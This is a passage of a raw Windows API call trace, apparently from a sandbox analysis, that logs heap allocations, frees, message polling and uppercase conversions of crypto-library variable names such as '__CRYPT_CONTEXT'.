(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0216.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0216.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0216.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0216.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0216.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0216.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0216.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.298] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0216.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0216.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0216.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.299] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0216.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0216.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0216.299] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0216.299] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0216.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0216.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0216.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0216.300] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0216.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0216.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0216.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0216.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0216.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0216.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0216.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0216.300] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0216.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0216.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0216.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0216.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0216.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0216.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0216.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0216.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0216.300] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0216.301] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0216.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0216.301] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0216.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0216.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0216.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0216.301] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0216.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0216.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.301] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0216.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0216.301] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0216.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0216.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0216.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0216.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0216.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0216.302] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0216.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0216.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0216.302] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0216.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0216.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0216.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0216.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0216.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0216.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0216.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0216.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0216.303] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0216.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0216.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a70 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0216.303] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0216.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0216.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0216.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0216.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0216.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0216.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0216.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0216.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0216.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0216.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0216.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0216.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0216.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0216.304] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0216.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0216.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0216.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0216.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0216.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0216.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0216.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0216.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0216.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0216.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0216.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0216.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0216.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0216.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 